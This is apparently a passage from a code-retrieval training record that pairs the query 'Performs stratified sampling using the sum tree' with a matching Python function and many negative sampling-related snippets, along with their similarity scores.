[0,1]\n ufun = lambda x: 1.0/np.diff(ulim)\n\n n = int(1e5)\n usample = statsFun.simpSample(ufun,n,ulim[0],ulim[1])\n self.assertGreaterEqual(usample.min(), ulim[0])\n self.assertLessEqual(usample.max(), ulim[1])\n\n nlim = [-10,10]\n nfun = lambda x: np.exp(-x**2./2.0)/np.sqrt(2.0*np.pi)\n nsample = statsFun.simpSample(nfun,n,nlim[0],nlim[1])\n self.assertGreaterEqual(nsample.min(), nlim[0])\n self.assertLessEqual(nsample.min(), nlim[1])\n\n self.assertGreaterEqual(scipy.stats.kstest(usample,'uniform')[1],0.01,'Uniform sample does not look uniform.')\n self.assertGreaterEqual(scipy.stats.kstest(nsample,'norm')[1],0.01,'Normal sample does not look normal.')\n self.assertLessEqual(scipy.stats.kstest(nsample,'uniform')[1],0.01,'Normal sample looks too uniform.')\n self.assertLessEqual(scipy.stats.kstest(usample,'norm')[1],0.01,'Uniform sample looks too normal.')", "def AddSample(self, sample):\n if not isinstance(sample, Sample):\n raise TypeError(\"Sample must be instance of Sample\")\n\n self.samples.append(sample.val)\n\n self.samples.reverse()\n self.samples.pop()\n self.samples.reverse()\n\n filteredValue = sum([a*b for a, b in zip(self.coef, self.samples)])\n\n return Sample(sample.t, filteredValue)", "def add_sample(self, sample: Tuple):\n self.samples.append(sample)\n if len(self.samples) > self.max_memory:\n self.samples.pop(0)", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n # dx = self.theta * (self.mu - x) + self.sigma * np.random.standard_normal(self.size)\n self.state = x + dx\n return self.state", "def sample(self):\r\n x = self.state\r\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\r\n self.state = x + dx\r\n return self.state", "def sample_fitness(individual):\n\n return individual.dataframe.sample(frac=0.1, random_state=0).mean().mean()", "def _sample(self, points: Iterable[float]) -> np.array:\n pass", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state", "def sample(self, x: Union[np.ndarray, float, list], ):\n x = self._sample_test(x)\n if x.ndim <= 1:\n y = 0\n for i in range(self.mixture_count):\n if self.dimensions == 1:\n y += self.weights[i] * self.one_d_normal(x, self.means[i], self.covs[i])\n else:\n y += self.weights[i] * self.multi_d_gauss(x, self.means[i], self.covs[i])\n else:\n x = np.squeeze(x, axis=1)\n y = np.zeros((x.shape[0], ))\n for i in range(self.mixture_count):\n if self.dimensions == 1:\n y += self.weights[i] * self.one_d_normal(x, self.means[i], self.covs[i])\n else:\n y += self.weights[i] * self.multi_d_gauss(x, self.means[i], self.covs[i])\n return y", "def sample(self, like_params):\n\t\traise NotImplementedError", "def test_samples_high_weight_elements_priority(self):\n s = private_sampling.ThresholdSample(\n 0.5, private_sampling.PrioritySamplingMethod)\n s.process(\"a\", 2.0)\n s.process(\"b\", 3.0)\n self.assertCountEqual([\"a\", \"b\"], s.elements.keys())", "def samplepoint(x,u):\n return point(x)", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array(\n [random.random() for i in range(len(x))]\n )\n self.state = x + dx\n return self.state", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.random.rand(*x.shape) \n self.state = x + dx\n return self.state", "def search_tree_sample(variables, formula, samples):\n\n to_use = list(variables)\n used_vars = []\n solns = [None]\n\n while to_use != []:\n next_var = to_use[0]\n to_use = to_use[1:]\n\n solns = black_box_sample(formula, solns, samples, used_vars, next_var)\n used_vars.append(next_var)\n\n return uniform_select(solns)", "def sample(self, n_samples: int) -> torch.Tensor:\n return self.dist.sample((n_samples,))", "def draw_samples_recursively(data: Any) -> Any:\n # if a dictionary return a copy of the dictionary try to sample each value recursively\n if isinstance(data, dict):\n data_dict: dict = data.copy()\n for key in data_dict:\n data_dict[key] = draw_samples_recursively(data_dict[key])\n return data_dict\n\n # if a list return a copy of the list try to sample each element recursively\n if isinstance(data, list):\n data_lst: list = data[:]\n for ii in range(len(data_lst)):\n data_lst[ii] = draw_samples_recursively(data_lst[ii])\n return data_lst\n\n # if a tuple return a copy of the tuple try to sample each element recursively\n if isinstance(data, Tuple):\n data_tuple = tuple(\n (draw_samples_recursively(data[ii]) for ii in range(len(data)))\n )\n return data_tuple\n\n # if ParamSamplerBase, sample a number\n if isinstance(data, ParamSamplerBase):\n data_sampler: ParamSamplerBase = data\n return data_sampler.sample()\n\n # otherwise return the original data\n return data", "def sampleIndex(self):\r\n x=random.random()\r\n i = 0\r\n n = len(self.weights)-1\r\n cummulativeWeight = 0\r\n if len(self.sampledActions) == 0:\r\n explorationWeight = 0\r\n else:\r\n explorationWeight = self.explorationFund / len(self.sampledActions)\r\n if n < 0:\r\n normalizationFactor = self.priorBelief\r\n else:\r\n normalizationFactor = sum(self.weights) + self.explorationFund + \\\r\n self.priorBelief*(1-self.priorTopicDistr.cummulative[n])\r\n while True:\r\n w = self.__getitem__(i)\r\n if i in self.sampledActions:\r\n w += explorationWeight\r\n cummulativeWeight += w\r\n if x <= cummulativeWeight/normalizationFactor:\r\n if i not in self.sampledActions:\r\n self.sampledActions.append(i)\r\n return i\r\n i += 1", "def _builtin_sample_uniform(key, lst, result, database=None, target=None, **kwdargs):\n mode = check_mode((key, lst, result,), ['gLv', 'gLn'], database=database, **kwdargs)\n identifier = '_uniform_%s' % key\n elements, tail = list_elements(lst)\n if len(elements) == 0:\n return []\n else:\n prob = Constant(1 / float(len(elements)))\n results = []\n if mode == 0:\n for i, elem in enumerate(elements):\n elem_identifier = (identifier, i)\n # res = unify_value(result, elem)\n results.append(((key, lst, elem),\n target.add_atom(identifier=elem_identifier, probability=prob,\n group=identifier)))\n else:\n res = None\n for el in elements:\n try:\n res = unify_value(el, result, {})\n break\n except UnifyError:\n pass\n if res is not None:\n results.append(((key, lst, res),\n target.add_atom(identifier=identifier, probability=prob)))\n return results", "def test_find_element(self):\n value = random.choice(self.values)\n exists = self.tree.find(self.tree.root, value)\n self.assertTrue(exists)", "def sample(self, rng_key: jnp.ndarray) -> jnp.ndarray:\n pass", "def get_sum(self):\n return self.__tree[0]", "def sample(self, size: int, equal_mode:bool=True):\n\n samples = torch.rand(size, dtype=self.dtype, device=self.tree.device) * self.tree[0]\n if equal_mode:\n offsets = torch.linspace(0, self.tree[0], size+1, device=self.tree.device)[:-1]\n samples /= size\n samples += offsets\n\n idxs = torch.zeros(size, dtype=torch.long, device=self.tree.device)\n\n return self._find(idxs, samples) - self.capacity + 1", "def add(self, sample, **kwargs):\n if not self.samples:\n self.init(sample)\n self.samples.append(sample)", "def sample(self, num_rows=1):\n raise NotImplementedError", "def sample(self, *args, **kwargs):", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.random.randn(len(x))\n self.state = x + dx\n return self.state", "def _get_sample(self):\n p = self._get_mean()\n u = self.random.random_sample(p.shape)\n sample = u < p\n return sample", "def testSampleRichness(self):\n self.tree.calculate_richness()\n self.assertEqual(1167, self.tree.get_species_richness(1))\n self.assertEqual(1171, self.tree.get_species_richness(2))\n self.assertEqual(self.tree.get_species_richness(1), self.tree.get_species_richness(1))\n self.assertEqual(self.tree.get_species_richness(2), self.tree.get_species_richness(2))\n self.assertEqual(self.tree.get_species_richness(3), self.tree.get_species_richness(3))" ]
[ "0.7230191", "0.65261966", "0.63430864", "0.60525787", "0.60525787", "0.60074574", "0.5991044", "0.5952631", "0.59495324", "0.5881766", "0.5785147", "0.57582784", "0.57345945", "0.57001364", "0.5682698", "0.5620183", "0.56149185", "0.56036645", "0.55956614", "0.55863214", "0.55782247", "0.55534893", "0.5546357", "0.5510808", "0.5510808", "0.5510808", "0.5510808", "0.54866934", "0.5479956", "0.5428093", "0.54254204", "0.5417725", "0.5416449", "0.54043347", "0.5391983", "0.5390845", "0.53848636", "0.53837967", "0.5374929", "0.5362213", "0.53620607", "0.53581995", "0.5353865", "0.53319526", "0.5328651", "0.53231806", "0.5317043", "0.530723", "0.53028107", "0.5301612", "0.5287782", "0.52830315", "0.52804863", "0.5273608", "0.5269742", "0.5261463", "0.52566576", "0.5240743", "0.52370507", "0.5236971", "0.5230418", "0.5227923", "0.5227367", "0.5226382", "0.52223635", "0.5218568", "0.521706", "0.52154624", "0.52072364", "0.52017987", "0.51960677", "0.5187484", "0.5182376", "0.5182278", "0.51755005", "0.51755005", "0.51755005", "0.51755005", "0.51755005", "0.517022", "0.5166803", "0.51601845", "0.5152498", "0.5151851", "0.5146634", "0.51432306", "0.5138528", "0.51347935", "0.5131094", "0.5130364", "0.5112995", "0.51011395", "0.50991666", "0.5098058", "0.50816983", "0.5080063", "0.5079074", "0.5073642", "0.5068514", "0.50649583" ]
0.58518076
10
Performs stratified sampling using the sum tree.
def stratified_sample(self, batch_size, rng): if self._total_priority() == 0.0: raise Exception('Cannot sample from an empty sum tree.') indices = parallel_stratified_sample(rng, self.nodes, np.arange(batch_size), batch_size, self.depth) return np.minimum(indices - self.low_idx, self.highest_set)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sample(tree, i, alpha=0.5, beta=0.5, only_tree=True):\n # for n in tree.nodes():\n # lab = tuple(n)\n # if len(n) == 1:\n # lab = \"(\" + str(list(n)[0]) + \")\"\n # tree.node[n] = {\"color\": \"black\", \"label\": lab}\n # print tree.nodes()\n\n if only_tree is True:\n tree_new = tree # Alter the input tree\n else:\n #tree_new = tree.subgraph(tree.nodes()) # nx < 2.0\n tree_new = tree.copy() # nx < 2.0\n\n #print(nocopy)\n #old_G = trilearn.graph.junction_tree.get_graph(tree)\n #(subtree, old_separators, probtree) = glib.random_subtree(tree, alpha, beta)\n\n # plotGraph(subtree, directory+\"subtree_\"+str(i)+\".eps\")\n # for n in subtree.nodes():\n # tree_old.node[n] = {\"color\": \"blue\", \"label\": tuple(n)}\n # if n in tree.nodes():\n # tree.node[n] = {\"color\": \"blue\", \"label\": tuple(n)}\n\n # plotGraph(tree_old.subgraph(tree_old.nodes()),\n # directory + \"tree(\" + str(i-1) + \")p.eps\")\n\n (_, subtree_nodes, subtree_edges, subtree_adjlist,\n old_separators, prob_subtree) = ss.random_subtree(tree, alpha, beta, i)\n\n (old_cliques,\n new_cliques,\n new_separators,\n P,\n neig) = sample_cond_on_subtree_nodes(i, tree_new, subtree_nodes, subtree_edges, subtree_adjlist)\n\n if only_tree is True:\n return tree_new\n #conn_nodes = set()\n #for clique in new_cliques:\n # conn_nodes |= clique\n\n # for n in tree.nodes():\n # lab = tuple(n)\n # if len(n) == 1:\n # lab = \"(\"+str(list(n)[0])+\")\"\n # if n in new_cliques:\n # tree.node[n] = {\"color\": \"red\", \"label\": lab}\n # plotGraph(tree.subgraph(tree.nodes()), directory+\"tree(\"+str(i)+\").eps\")\n\n #G = trilearn.graph.junction_tree.get_graph(tree)\n # G.node[i] = {\"color\": \"red\"}\n # for n in old_G:\n # if n in conn_nodes:\n # old_G.node[n] = {\"color\": \"blue\"}\n # G.node[n] = {\"color\": \"blue\"}\n\n # plotGraph(G, directory+\"G\"+str(i)+\".eps\")\n # plotGraph(old_G, directory+\"G\"+str(i-1)+\"p.eps\")\n\n # Proposal kernel\n K_st = None\n if len(subtree_nodes) == 1:\n # There might be two possible subtrees so\n # we calculate the probabilities for these explicitly\n K_st = pdf(tree, tree_new, alpha, beta, i)\n else:\n K_st = prob_subtree\n for c in P:\n K_st *= P[c] * neig[c]\n return tree_new, K_st, old_cliques, old_separators, new_cliques, new_separators", "def uniform_sample(X, y, S, b, d):\n\n\tX['label'] = y\n\n\tW = pd.DataFrame({'group': [1, 1, 0, 0], 'label': [1, 0, 1, 0]})\n\n\t# Calculate weight for each combination of sensitive attribute and class,\n\t# given by the number of examples in each group divided by the number\n\t# that should be in each group if the data were non-discriminatory\n\t# NOTE: Algorithm 4 in the paper actually usees a denominator that appears to be wrong...\n\tweights = [[len(X[X[S] == s]) * len(X[X['label'] == c]) / float(len(X)*0.25) \n\t\t\t\t# / float(len(X) * len(X[(X[S] == s) & (X['label'] == c)])) \\\n\t\t\t\tfor c in [1, 0]] for s in [1, 0]]\n\n\tsizes = [[len(X[(X[S] == s) & (X['label'] == c)]) for c in [1, 0]] for s in [1, 0]]\n\n\tW['weight'] = [i for j in weights for i in j]\n\tW['size'] = [i for j in sizes for i in j]\n\tW = W.assign(num = lambda x: x.size * x.weight)\n\n\t# Divide the data into the four groups based on class/group\n\tdp = X[(X[S] == b) & (X['label'] == d)]\n\tdn = X[(X[S] == b) & (X['label'] != d)]\n\tfp = X[(X[S] != b) & (X['label'] == d)]\n\tfn = X[(X[S] != b) & (X['label'] != d)]\n\n\t# Uniformly sample from each group\n\tdp = dp.sample(n = W.loc[(W['group'] == b) & (W['label'] == d), 'num'].iloc[0].astype(int), replace = True)\n\tdn = dn.sample(n = W.loc[(W['group'] == b) & (W['label'] != d), 'num'].iloc[0].astype(int), replace = True)\n\tfp = fp.sample(n = W.loc[(W['group'] != b) & (W['label'] == d), 'num'].iloc[0].astype(int), replace = True)\n\tfn = fn.sample(n = W.loc[(W['group'] != b) & (W['label'] != d), 'num'].iloc[0].astype(int), replace = True)\n\n\tX_prime = pd.concat([dp, dn, fp, fn])\n\tX.drop('label', axis = 1, inplace = True)\n\ty_prime = X_prime['label'].tolist()\n\tX_prime = X_prime.drop('label', axis = 1)\n\n\treturn(X_prime, y_prime)", "def sampling_algorithm(self, X, y):\r\n n_to_sample = self.det_n_to_sample(self.proportion)\r\n\r\n if n_to_sample == 0:\r\n return self.return_copies(X, y, \"Sampling is not needed\")\r\n\r\n X_min = X[y == self.min_label]\r\n X_maj = X[y == self.maj_label]\r\n\r\n # fitting nearest neighbors model to find closest majority points to\r\n # minority samples\r\n nn_params = {**self.nn_params}\r\n nn_params['metric_tensor'] = \\\r\n self.metric_tensor_from_nn_params(nn_params, X, y)\r\n\r\n density = self.calculate_density(X_min, X_maj, nn_params)\r\n\r\n # fitting nearest neighbors model to minority samples to run\r\n # SMOTE-like sampling\r\n n_neighbors = min([len(X_min), self.n_neighbors+1])\r\n nnmt = NearestNeighborsWithMetricTensor(n_neighbors=n_neighbors,\r\n n_jobs=self.n_jobs,\r\n **nn_params)\r\n nnmt.fit(X_min)\r\n ind = nnmt.kneighbors(X_min, return_distance=False)\r\n\r\n samples = self.sample_simplex(X=X_min,\r\n indices=ind,\r\n n_to_sample=n_to_sample,\r\n base_weights=density)\r\n\r\n # do the sampling\r\n #samples = []\r\n #while len(samples) < n_to_sample:\r\n # idx = self.random_state.choice(np.arange(len(density)), p=density)\r\n # random_neighbor_idx = self.random_state.choice(ind[idx][1:])\r\n # X_a = X_min[idx]\r\n # X_b = X_min[random_neighbor_idx]\r\n # samples.append(self.sample_between_points(X_a, X_b))\r\n\r\n return (np.vstack([X, samples]),\r\n np.hstack([y, np.repeat(self.min_label, len(samples))]))", "def _graph_fn_sample_stochastic(distribution):\n return distribution.sample()", "def sampling_algorithm(self, X, y):\r\n\r\n n_to_sample = self.det_n_to_sample(self.proportion)\r\n\r\n if n_to_sample == 0:\r\n return self.return_copies(X, y, \"Sampling is not needed.\")\r\n\r\n # standardization is needed to make the range of the propensity scores\r\n # similar to that of the features\r\n mms = MinMaxScaler()\r\n X_trans = mms.fit_transform(X) # pylint: disable=invalid-name\r\n\r\n X_min = X_trans[y == self.min_label]\r\n\r\n # adding propensity scores as a new feature\r\n X_new = np.column_stack([X_trans, self.propensity_scores(X_trans, y)])\r\n X_min_new = X_new[y == self.min_label] # pylint: disable=invalid-name\r\n\r\n # finding nearest neighbors of minority samples\r\n n_neighbors = min([len(X_new), self.n_neighbors+1])\r\n\r\n ind = self.neighborhood_structure(X_new, y, n_neighbors, X_min_new)\r\n\r\n # noise removal\r\n t_hat = np.sum(y[ind[:, 1:]] == self.min_label, axis=1)\r\n to_remove = np.where(t_hat < self.t * n_neighbors)[0]\r\n\r\n if len(to_remove) >= len(X_min) - 1:\r\n return self.return_copies(X, y,\r\n \"most minority samples indentified as noise\")\r\n\r\n n_to_sample = n_to_sample + to_remove.shape[0]\r\n\r\n samples = self.generate_samples(X_min=X_min,\r\n to_remove=to_remove,\r\n X_trans=X_trans,\r\n y=y,\r\n ind=ind,\r\n n_to_sample=n_to_sample)\r\n\r\n X_min = np.delete(X_min, to_remove, axis=0)\r\n\r\n # do the sampling\r\n #samples = []\r\n #while len(samples) < n_to_sample:\r\n # idx = self.random_state.randint(len(X_min))\r\n # # finding the number of minority neighbors\r\n # t_hat = np.sum(y[ind[idx][1:]] == self.min_label)\r\n # if t_hat < self.t*n_neighbors:\r\n # # removing the minority point if the number of minority\r\n # # neighbors is less then the threshold\r\n # # to_remove indexes X_min\r\n # if idx not in to_remove:\r\n # to_remove.append(idx)\r\n # # compensating the removal of the minority point\r\n # n_to_sample = n_to_sample + 1\r\n #\r\n # if len(to_remove) == len(X_min):\r\n # _logger.warning(self.__class__.__name__ + \": \" +\r\n # \"all minority samples identified as noise\")\r\n # return X.copy(), y.copy()\r\n # else:\r\n # # otherwise do the sampling\r\n # X_b = X_trans[self.random_state.choice(ind[idx][1:])]\r\n # samples.append(self.sample_between_points(X_min[idx], X_b))\r\n\r\n return (mms.inverse_transform(np.vstack([X_trans[y == self.maj_label],\r\n X_min,\r\n samples])),\r\n np.hstack([np.repeat(self.maj_label,\r\n np.sum(y == self.maj_label)),\r\n np.repeat(self.min_label, len(X_min)),\r\n np.repeat(self.min_label, len(samples))]))", "def sample(self, seg_logit, seg_label):", "def stratify(self):\n groups = self.group()\n folds = []\n for group in groups:\n folds.append(self.sample(group))\n return [sum([folds[j][i] for j in range(len(folds))], []) \\\n for i in range(self.nfolds)]", "def diverse_sampler(self):\n\n # Sample number of nonzero idxs\n num_idxs = np.random.randint(low=1, high=self.K-1)\n\n # Sample actual idxs in state that are nonzero\n idxs = []\n # can have nonzero terms up to state[K-2]\n all_states = [i for i in range(self.K - 1)]\n for i in range(num_idxs):\n rand_id = np.random.randint(low=0, high=len(all_states))\n idxs.append(all_states.pop(rand_id))\n\n # sort idxs from largest to smallest to allocate\n # potential correctly\n idxs.sort()\n idxs.reverse()\n\n # allocate potential\n xs = self.simplex_sampler(num_idxs)\n\n # fill with appropriate number of pieces adding on any remaindr\n remainder = 0\n state = np.zeros(self.K+1, dtype=int)\n for i in range(num_idxs):\n idx = idxs[i]\n pot_idx = xs[i] + remainder\n num_pieces = int(pot_idx/self.weights[idx])\n state[idx] += num_pieces\n # update remainder\n remainder = pot_idx - num_pieces*self.weights[idx]\n\n return state", "def get_selected_subsamples(sample_func, clusters, trajs_dict, visit_profile, Nsample, false_rate=80):\n print('The desired false rate is %f'%(false_rate/Nsample))\n crter = 0\n done_first_round = False\n nclusters = len(clusters)\n \n print('Start the first selection until the number of potential profiles is more than Nsample')\n while crter < Nsample:\n i = np.random.choice(range(nclusters))\n if len(clusters[i]) > Nsample*5 or len(clusters[i]) < Nsample: continue\n # try sampling\n selected_spl, plist_spl = sample_func(trajs_dict, plist=None, usrs=clusters[i])\n # do the deterministic attack\n a2 = get_trick_mat(clusters[i] , selected_spl, visit_profile)\n nonzero_list = [np.sum(np.count_nonzero(ai))>=1 for ai in make_sym_mat(a2)] \n crter = np.sum(nonzero_list)\n \n print('Finish the first round selection, %d candidates are selected from cluster %d'%(crter, i))\n round_one_usrs = np.array(clusters[i])[nonzero_list]\n \n crter2 = 0; len_rone = len(round_one_usrs)\n print('Start the second selection until false rate %f'%(false_rate/Nsample))\n while crter2 < false_rate:\n final_selected_usrs = round_one_usrs[np.random.choice(len_rone, Nsample, replace=False)]\n tmp = get_trick_mat(final_selected_usrs, selected_spl, visit_profile)\n crter2 = np.sum([np.sum(np.count_nonzero(ai))>=1 for ai in make_sym_mat(tmp)])\n print('Final false rate for deterministic attack%f'%(crter2/Nsample))\n return selected_spl, final_selected_usrs, plist_spl", "def eval_sampling_point(self, sampling_point):\n return Solution(self, sampling_point)", "def straight_prune_subsample(neuron, number_of_nodes):\n if(neuron.n_node > 200):\n neuron, distance = straight_subsample_with_fixed_number(neuron, 200)\n sp_neuron, state = prune(neuron=neuron,\n threshold=2*distance,\n lowest_number=number_of_nodes)\n while(~state):\n distance += 1\n sp_neuron = straigh_subsample(neuron, distance)\n sp_neuron, state = prune(neuron=sp_neuron,\n threshold=2*distance,\n lowest_number=number_of_nodes)\n return sp_neuron", "def sample(self):\n return self._root.sample()", "def sow_samples(self, n, combos=None, constants=None, verbosity=1):\n fn_args, cases = self.farmer.gen_cases_fnargs(n, combos)\n self.sow_cases(\n fn_args, cases, constants=constants, verbosity=verbosity\n )", "def Sens_t_sample(poly, dist, samples, rule=\"random\"):\n generator = Saltelli(dist, samples, poly, rule=rule)\n\n dim = len(dist)\n zeros = [0] * dim\n variance = numpy.var(generator[zeros], -1)\n return numpy.array(\n [\n 1\n - numpy.mean(\n (generator[~index] - generator[zeros]) ** 2,\n -1,\n )\n / (2 * numpy.where(variance, variance, 1))\n for index in numpy.eye(dim, dtype=bool)\n ]\n )", "def straight_subsample_with_fixed_number(neuorn, num):\n l = sum(neuorn.distance_from_parent)\n branch_number = len(np.where(neuorn.branch_order[neuorn.n_soma:] == 2))\n distance = l/(num - branch_number)\n neuron = straigh_subsample(distance)\n return distance, neuron", "def GetPhyloSebsequentScore(tree, phenotree, phen_ind, skip=0, with_rand=False, dist_only=False, dist=None):\n population = (len(tree) * 2) - 1\n subscore = np.zeros(tree.genotype.shape[1] - skip)\n node_to_arr = lambda n: np.array(n.genotype.todense().astype(np.int))[0]\n for i, (cur_node, phen_node) in tqdm.tqdm(enumerate(zip(tree.traverse(), phenotree.traverse())),\n total=population, desc='Iterating tree'):\n if not cur_node.is_root():\n if not cur_node.is_leaf() and with_rand and cur_node.random[phen_ind]: continue\n node = node_to_arr(cur_node)\n prev_node = node_to_arr(cur_node.up)\n\n gene_state = node[skip:]\n prev_gene_state = prev_node[skip:]\n\n phen_state = phen_node.genotype[0, phen_ind]\n prev_phen_state = phen_node.up.genotype[0, phen_ind]\n\n subscore += np.abs((1.333 * prev_phen_state * prev_gene_state) +\n (.666 * prev_phen_state * gene_state) +\n (.666 * phen_state * prev_gene_state) +\n (1.333 * phen_state * gene_state) -\n phen_state -\n prev_phen_state -\n gene_state -\n prev_gene_state +\n 1)\n\n if dist_only:\n hist_ = np.histogram(subscore, bins=int(1e7))\n fit_dist = rv_histogram(hist_)\n fit_dist.bin = np.diff(hist_[1]).max()\n return fit_dist\n if dist is not None:\n return dist.sf(subscore)\n else:\n return subscore", "def reset(self):\n self.st = segment_tree.SegmentTreeSampler(self.n, np.ones(self.n) * self.reg, self.random_state)", "def test_generated_sample_distribution(\n jax_dist, sp_dist, params, N_sample=100_000, key=random.PRNGKey(11)\n):\n\n if jax_dist not in [dist.Gumbel]:\n pytest.skip(\n \"{} sampling method taken from upstream, no need to\"\n \"test generated samples.\".format(jax_dist.__name__)\n )\n\n jax_dist = jax_dist(*params)\n if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:\n our_samples = jax_dist.sample(key, (N_sample,))\n ks_result = osp.kstest(our_samples, sp_dist(*params).cdf)\n assert ks_result.pvalue > 0.05", "def sample(self, k):\n result = \"\"\n current = self.gen_beginning()\n for i in range(0, k):\n result += current[0] + \" \"\n t = tuple(current)\n if t in self.dict:\n c_sum = self.dict[t][self.sum_index]\n rand = random.randint(0, c_sum)\n new_term = \"\"\n for term, count in self.dict.iteritems():\n if rand > count:\n rand -= count\n else:\n new_term = term\n break\n current.remove(current[0])\n current.append(new_term)\n else:\n current = self.gen_beginning()\n return result", "def straigh_subsample(neuorn, distance):\n\n # Selecting the main points: branching nodes and end nodes\n selected_index = get_main_points()\n\n # for each segment between two consecuative main points, a few nodes from the segment will be added to the selected node.\n # These new nodes will be selected base on the fact that neural distance of two consecuative nodes is around 'distance'.\n # Specifically, it starts from the far main point, and goes on the segment toward the near main point. Then the first node which is\n # going to add has the property that it is the farest node from begining on the segment such that its distance from begining is\n # less than 'distance'. The next nodes will be selected similarly.\n\n for i in selected_index:\n upList = np.array([i], dtype = int)\n index = neuorn.parent_index[i]\n dist = neuorn.distance_from_parent[i]\n while(~np.any(selected_index == index)):\n upList = np.append(upList,index)\n index = neuorn.parent_index[index]\n dist = np.append(dist, sum(neuorn.distance_from_parent[upList]))\n dist = np.append(0, dist)\n (I,) = np.where(np.diff(np.floor(dist/distance))>0)\n I = upList[I]\n selected_index = np.append(selected_index, I)\n selected_index = np.unique(selected_index)\n neuron = neuron_with_selected_nodes(selected_index)\n return neuron", "def test_sampling1 ():\n cpus = list(range(C.N_PARALLEL))\n affinity = dict(cuda_idx=C.CUDA_IDX, workers_cpus=cpus)\n agent_ = findOptimalAgent(reward=None)\n agent = CategoricalPgAgent(AcrobotNet, \n initial_model_state_dict=agent_.state_dict())\n s0 = np.array([1, 0, 1/np.sqrt(2), 1/np.sqrt(2), 4, 2], dtype=np.float)\n sampler = SerialSampler(\n EnvCls=rlpyt_make,\n env_kwargs=dict(id=C.ENV, reward=None, internalStateFn=C.INTERNAL_STATE_FN, s0=s0),\n batch_T=500,\n batch_B=16,\n max_decorrelation_steps=0,\n )\n sampler.initialize(\n agent=agent,\n affinity=affinity,\n seed=0\n )\n _, traj_info = sampler.obtain_samples(0)\n print(np.mean([t['DiscountedReturn'] for t in traj_info]))", "def balanced_sampling(dat: pd.DataFrame, logger=None):\n if logger == None:\n logging.basicConfig(\n level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n logger = logging.getLogger(__name__)\n \n \n # upsampling\n logger.info('Start balanced sampling')\n subsample = []\n num_of_each_class = dat.iloc[:, -1].value_counts().to_numpy()\n if num_of_each_class.std()*1.0 / num_of_each_class.mean() < 0.1:\n logger.info('The given data is balance.')\n # the dataset is balanced\n return dat\n logger.info('Given dataset is unbalance')\n logger.info('Sampling data from each class to generate a new dataset')\n n_smp = num_of_each_class.max()\n for label in dat.iloc[:, -1].value_counts().index:\n samples = dat[dat.iloc[:, -1] == label]\n num_samples = len(samples)\n index_range = range(num_samples)\n # take all from the set\n indexes = list(np.random.choice(index_range, size=num_samples, replace=False))\n indexes2 = list(np.random.choice(\n index_range, size=n_smp-num_samples, replace=True)) # add random items\n indexes.extend(indexes2)\n subsample.append(samples.iloc[indexes, :])\n logger.info('End with sampling')\n out = pd.concat(subsample)\n out = out.sample(frac=1).reset_index(drop=True) # shuffle and re index\n return out", "def sample(self, rng, query_value=None):\n nodes = jnp.array(self.nodes)\n query_value = (\n jax.random.uniform(rng) if query_value is None else query_value)\n query_value *= self._total_priority()\n\n _, index, _ = jax.lax.fori_loop(0, self.depth, step,\n (query_value, 0, nodes))\n\n return np.minimum(index - self.low_idx, self.highest_set)", "def sample(self, root, tree, sample_num, for_d):\n\n # all_score = self.sess.run(self.generator.all_score)\n # all_score is a matrix with shape [n_node, n_node]\n all_score = self.generator.all_score\n samples = []\n paths = []\n n = 0\n\n while len(samples) < sample_num:\n current_node = root\n previous_node = -1\n paths.append([])\n is_root = True\n paths[n].append(current_node)\n while True:\n node_neighbor = tree[current_node][1:] if is_root else tree[current_node]\n # print(\"////\", tree[current_node])\n is_root = False\n if len(node_neighbor) == 0: # the tree only has a root\n return None, None\n if for_d: # skip 1-hop nodes (positive samples)\n if node_neighbor == [root]:\n # in current version, None is returned for simplicity\n return None, None\n if root in node_neighbor:\n node_neighbor.remove(root)\n\n # we retrieve embeddings corresponding to current node's neighbors\n # the multiply of g_v with shape (1, 50) and g_vi with shape(1, 50) is a scala\n # to calculate the multiply of g_v and g_vi: we calculate the \"multiplication\" (inner product) between embedding_matrix with shape(n_node, 50) and its transpose\n # then saved the result in self.score with shape (n_node, n_node) in dis_torch.py\n # all_score has the shape = (5254, 5254), each row is a list of scala, each scala is the \"multiplication\" (inner product) between a particular node to an other node in the graph\n # due to for each current_node, we have a list of its neighbors, saved in [node_neighbor]\n # we can retrieve a list of scalas that equal to the \"multiplications\" (inner product) between g_v(current node) to its neighbor g_vi\n # to do that, we have:\n relevance_probability = all_score[current_node][node_neighbor]\n\n # convert tensor to numpy array\n relevance_probability = relevance_probability.cpu().detach().numpy()\n\n # finally, applying softmax function, we get the relevance probability of current_node and its neighbors, as formed in the paper\n relevance_probability = utils.softmax(relevance_probability)\n \n # pick a random node from its neighbors based on relevance_probability\n next_node = np.random.choice(node_neighbor, size=1, p=relevance_probability)[0] # select next node\n # print(\"???\", next_node)\n paths[n].append(next_node)\n if next_node == previous_node: # terminating condition\n samples.append(current_node)\n break\n previous_node = current_node\n current_node = next_node\n n = n + 1 # n equal to sample_num\n return samples, paths # for each sample, we get one path from root to that sample", "def test_simpSample(self):\n\n #uniform dist\n ulim = [0,1]\n ufun = lambda x: 1.0/np.diff(ulim)\n\n n = int(1e5)\n usample = statsFun.simpSample(ufun,n,ulim[0],ulim[1])\n self.assertGreaterEqual(usample.min(), ulim[0])\n self.assertLessEqual(usample.max(), ulim[1])\n\n nlim = [-10,10]\n nfun = lambda x: np.exp(-x**2./2.0)/np.sqrt(2.0*np.pi)\n nsample = 